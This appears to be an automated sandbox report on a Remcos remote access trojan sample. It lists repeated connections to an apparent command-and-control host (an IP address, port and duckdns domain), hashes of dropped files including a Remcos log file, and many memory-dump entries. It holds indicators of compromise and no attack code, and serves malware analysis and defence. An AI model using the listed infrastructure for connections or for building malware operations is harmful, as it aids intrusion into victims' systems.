CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp
CO 181.142.162.155:4576 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ck4s2lbx.thz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3544-8-0x0000019FB0280000-0x0000019FB02A2000-memory.dmp

memory/3544-9-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/3544-10-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-11-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-12-0x0000019FB0270000-0x0000019FB0280000-memory.dmp

memory/3544-13-0x0000019FB0FB0000-0x0000019FB1756000-memory.dmp

memory/3544-15-0x0000019FB0310000-0x0000019FB031C000-memory.dmp

memory/3544-16-0x0000019FB0C30000-0x0000019FB0CA6000-memory.dmp

memory/3544-17-0x0000019FB0D70000-0x0000019FB0D8E000-memory.dmp

memory/1064-18-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/1064-20-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-19-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-29-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp

memory/1064-34-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/1916-35-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5746a9547ca0d2ff66b8de81e48ddc64
SHA1 6e9cdbbdb0c65caf97fbcd8787d67749b55a6b5f
SHA256 eedb2133a9344f6d8fdc81f8fd710954c165e8d88d9516be400f8a94132a8982
SHA512 f707a525cbb18c297badc0f1187f71aea9b650c7cfdc3ee727093adfa2cab1a83550b842d666e840b6099ccaa4acb5694567317cd62f10359298f720785f0a31

memory/1916-39-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3544-40-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp

memory/1916-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-43-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-46-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-47-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-54-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-55-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-57-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-58-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-59-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-60-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-61-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-62-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-64-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-65-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-66-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-67-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-68-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-69-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-70-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-72-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-73-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-74-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-75-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-76-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-77-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-78-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-80-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-81-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-82-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-83-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-84-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-85-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-86-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 da07760c88eb4c4e2b3fca9b87fc5972
SHA1 27cba49a2c23c3a00f6226043661e09ee3e23f63
SHA256 c1cc350e3f0c1de9cd84dc402a2a8f3acdf6a0e7a5a7a9700339d8633312f74d
SHA512 8a76c611ae15b9c7c7faf061966c7c80a4ced75b77d652c8b09af44dc27b23bbfd9544992a9a34c64753c3ad420251e58d3b1743c8f8e64b22027f654e059842

memory/1916-88-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-89-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-90-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-91-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-92-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-93-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-94-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-96-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-98-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-101-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-102-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-103-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1916-109-0x0000000000400000-0x0000000000482000-memory.dmp